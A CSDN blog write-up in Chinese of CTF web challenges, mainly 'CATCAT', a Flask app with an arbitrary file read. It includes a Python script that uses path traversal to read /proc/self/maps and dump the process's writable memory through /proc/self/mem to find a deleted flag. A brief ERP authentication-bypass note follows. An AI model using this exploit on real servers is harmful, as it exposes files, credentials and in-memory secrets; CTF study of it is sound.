CATcat_wp_web flask 和华夏erp

最新推荐文章于 2023-05-19 15:47:27 发布
最新推荐文章于 2023-05-19 15:47:27 发布
阅读量587 收藏 1
点赞数
分类专栏: ctf 文章标签: python linux flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DoubleLiii/article/details/128836280
版权
文章描述了一次网络安全挑战,涉及到web应用中的文件读取漏洞,包括session伪造、任意文件读取。问题在于一个使用PythonFlask框架的应用,flag被存储在内存中并随后删除。作者通过读取Linux的/proc/self/mem来尝试找到被删除的flag,编写脚本从可读内存区域进行搜索。此外,还提到了对JS文件的分析以寻找认证绕过的线索。
摘要由CSDN通过智能技术生成

CATctf web 方向有关文件读取,session伪造,任意文件读取,内存读取

CATCAT

存在文件任意读取,试一下etc/passwd

抓包看后是python flask框架 app.py

尝试读取主程序源代码

查看后发现读取flag后又删除,flag保存在内存之中

linux下存在 proc 目录 下 cmdline cwd exe environ fd (如果用os remove ,目录下还可以得到被删除内容) self**

直接读根目录下flag不存在,读取内存 proc/self/mem linux内存权限不同区域不同,读取可读取区域的内存 用 proc/self/maps看不同区域的权限


写个脚本读取全部内存rw,然后寻找flag

最后脚本代码

import requests
import re

url="http://61.147.171.105:59618"
site="info?file=../../../proc/self/mem&start=%s&end=%s"
maps_reg = "([a-z0-9]{12}-[a-z0-9]{12}) rw.*?00000000 00:00 0"
maps_url = f"{url}/info?file=../../../../../proc/self/maps"
maps = re.findall(maps_reg,requests.get(maps_url).text)
        
for m in maps:
        start,end=m.split('-')[0],m.split('-')[1]
        #start,end =int (start,16),int (end,16)
        print(start,end)
        start=str(int(start,16))
        end=str(int(end,16))
        readurl=f'{url}/info?file=../../../../proc/self/mem&start={start}&end={end}'
        res=requests.get(readurl).content
        #secret = re.findall(b"[a-z0-9A-Z]{32}\*abcdefgh",res)
        #if secret:
        #   print(secret)
        flag = re.findall(b"[a-zA-Z]{4}\{[a-z0-9A-Z-_]*\}",res)
        if flag:
            print(flag)

easypass
找奇怪的js,发现login.JS 查看源码
源码写erp系统,搜一下,发现有检验漏洞



跟着图pass

结束 信息搜集 认证绕过

DoubleLiii
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SpringBoot 框架华夏 ERP 源码审计1
08-03
1. requestUrl 中如果存在 / doc.html,/register.html,/login.html 字段就可 2. 传 verify() 法进判
CTF之一天一题:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1574
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
CATCTF wp
wha1e的博客
01-03 3377
总体感觉一般,做题体验不是很好,不过也算是近期比较认真的打的一场比赛。
catf1ag Web writeup(wp) 可能会持续更新
mumuzi的博客
01-14 3639
catf1ag web水文
攻防世界WEB进阶——Cat wp
weixin_42499640的博客
07-31 1004
首先打开题目是个发现是个云端测试 提示输入域名 先输个baidu.com 没反应 输入百度的ip 220.181.38.148 反馈了 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transmitted, 0 receive...
utilite:在 Utilite 上启动 Fedora 21 的补丁和说明
06-06
在 Utilite 上启动 Fedora 21 的补丁和说明 !! 此文档在精美的 github 查看器中无法正确显示。 一些转义斜线被删除。 要么直接查看,要么使用 git 来查看并使用编辑器。 如果从 github 查看器复制,则 setenv catcat...
CAT猫.zip猫.zip
12-05
通常,压缩包(如.zip)会包含多个文件或文件夹,并且标签"CATCAT猫.zip"也不太符合常规的标签格式。为了提供准确的IT知识点,我需要更清晰、更具体的文件信息。 不过,我可以基于一般的压缩文件处理和IT知识来提供...
正则表达式详细介绍(下)
10-23
正则表达式是一种文本匹配工具,它定义了一种规则来确定一个字符串是否符合特定的模式,广泛应用于数据处理和搜索替换等领域。下面将详细介绍正则表达式中的一些高级知识点。 首先,正则表达式中的“单词边界”概念...
深入浅出之正则表达式入门学习
02-11
正则表达式是一种强大的文本处理工具,用于匹配、查找、替换和分析字符串。它通过一套预定义的规则和特殊字符组合来定义一个模式,从而在文本中找出符合该模式的所有内容。本文主要针对正则表达式的入门知识进行深入...
常用正则表达式
04-16
例如,`cat*` 匹配 "cat"、"catcat" 或 "catcatcat"。 4. **预定义字符类**:如 `\d`(匹配数字,相当于 `[0-9]`)、`\D`(匹配非数字)、`\w`(匹配字母数字下划线,相当于 `[a-zA-Z0-9_]`)、`\W`(匹配非字母...
基于Java和Vue的小企业开源ERP软件华夏设计源码
最新发布
04-19
本源码为基于Java和Vue的小企业开源ERP软件华夏设计,共包含728个文件,其中java文件309个,vue文件226个,xml文件63个,js文件58个,jpg文件13个,less文件11个,png文件10个,xls文件7个,sh文件5个,gitattributes文件3个。该项目是一个小企业开源ERP软件,目前专注进销存+财务+生产功能,包括零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等模块。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能,并拥有商品库存、出入库统计等报表。同时对角色和权限进行了管理。
华夏erp项目工程源码
11-15
华夏erp项目工程源码
CTFWEB基础篇
qq_53058639的博客
03-17 4103
简介JavaScript 是互联网上最流行的脚本语言,这门语言可用于 HTML 和 web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。作用JavaScript 是脚本语言JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。JavaScript 很容易学习。
2023CTFSHOW愚人杯部分WP
qq_42585535的博客
04-04 714
call_user_func**来RCE。
NepCTF2022 WP
Pysnow's Blog
07-20 2260
NepCTFWriteUp
erp java 开源_华夏ERP完整开源版J2EE代码
weixin_30385221的博客
02-20 1559
很多人说华夏ERP(英文名:jshERP)是目前唯一完整开源的进销存系统虽然目前只有进销存+财务的功能,但后面将会推出ERP的全部功能,大家一起努力吧部署如有问题请联系QQ:752718920,欢迎加入华夏ERP交流群,群号码:120725710系统的默认超管账户:admin,默认租户账号:jsh,默认密码均为:123456本系统演示地址:http://www.huaxiaerp.com,账号:j...
Flask介绍
P1__3的博客
10-24 1947
一、简介 Flask得核心在于werkzeug(路由模块),jinja2模板引擎 类比Django:路由、模板、ORM Flask要完成功能,依赖于丰富的插件(扩展模块) 常用问题:Django和Flask有什么区别? 二、环境搭建 virtualenvwrapper来创建、管理我们的虚拟环境 开发中,我们一个项目是要对应应虚拟环境的 1、安装 虚拟环境 pip install virtualenvwrapper-win 2、配置虚拟环境主目录 在windows上环境变量中添加 环境变
华夏ERP-V3.2 部署(windows)
weixin_47631745的博客
05-19 3389
(因为之前安装JDK的版本是18,刚开始也替换了pom.xml的jdk版本,然后报错,接着改了Project Structrue的jdk版本,还是报错,又接着改settings里面build的jdk版本,也是各种报错,最后还是在Project Structrue那里老老实实的下载了一个1.8,改回来用的1.8)(第一次源码部署项目和使用IDEA,菜鸟一个,选择导入的jshERP-3.2,IDEA不能识别,导致各种问题,自己去配置Project Structrue,走了弯路。
介绍两个Python web框架:Django & Tornado
weixin_33948416的博客
06-28 605
在各种语言平台中,python涌现的web框架恐怕是最多的;猜想原因应该是在py中构造框架十分简单,使得轮子不断被发明。 这里记述一下我了解过的两个py web框架,供大家参考,希望能起他山之石的作用。 ====== Django ====== Django 应该是最出名的py框架,Google App Engine甚至Erlang都有框架受它影响。 Dj...
猫猫头带来了一个字符串给你,这个字符串由小写字母和?字符组成,事实上,你可以将字符串中的?字符替换成任意小写字母,猫猫头知道,当你将所有?替换成你想替换的字母后,这个字符串中的所有子字符串中"catcat"有且仅出现一次。 子字符串[l,r]指原字符串中从第l个字符开始的连续的(r−l+1)个字符串。 输入 第一行一个整数t(1≤t≤2000) - 测试样例的数量 接下来有t个测试样例,每一个测试样例包括两行,第一行一个整数n(1≤n≤50) - 猫猫头给你的字符串的长度 第二行有一行长度为n的字符串 输出 每个测试样例输出一行,如果能满足猫猫头的要求,则输出Yes,否则输出No,你可以输出任意大小写的YES or NO
07-13
好的,让我来帮你解答这个...对于每个样例,我们通过遍历字符串中的每个子字符串,检查是否有多个"catcat"出现。如果有多个出现,则输出"No",否则输出"Yes"。 希望这个解答能帮到你!如果还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值